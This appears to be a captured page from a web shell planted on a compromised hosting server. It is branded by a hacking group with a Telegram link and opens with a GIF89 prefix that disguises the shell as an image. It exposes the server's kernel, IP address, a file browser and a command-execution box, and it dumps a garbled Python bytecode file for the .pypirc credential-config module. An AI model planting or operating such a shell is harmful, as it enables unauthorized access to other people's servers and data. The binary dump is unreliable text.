GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium22.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
68.65.122.106
/
opt
/
alt
/
python312
/
lib
/
python3.12
/
site-packages
/
setuptools
/
_distutils
/
__pycache__
[ HOME ]
Exec
Submit
config.cpython-312.pyc
� t��e/ � �B � d Z ddlZddlmZ ddlmZ dZ G d� de� Zy) z�distutils.pypirc Provides the PyPIRCCommand class, the base class for the command classes that uses .pypirc in the distutils.command package. � N)�RawConfigParser� )�CommandzE[distutils] index-servers = pypi [pypi] username:%s password:%s c �^ � e Zd ZdZdZdZdZdZdddez fdgZd gZ d � Z d� Zd� Zd � Z d� Zd� Zy)� PyPIRCCommandz6Base command that knows how to handle the .pypirc filezhttps://upload.pypi.org/legacy/�pypiNzrepository=�rzurl of repository [default: %s])� show-responseNz&display full response text from serverr c �| � t j j t j j d� d� S )zReturns rc file path.�~z.pypirc)�os�path�join� expanduser��selfs ��/builddir/build/BUILDROOT/alt-python312-setuptools-69.0.2-1.el8.x86_64/opt/alt/python312/lib/python3.12/site-packages/setuptools/_distutils/config.py�_get_rc_filezPyPIRCCommand._get_rc_file% s&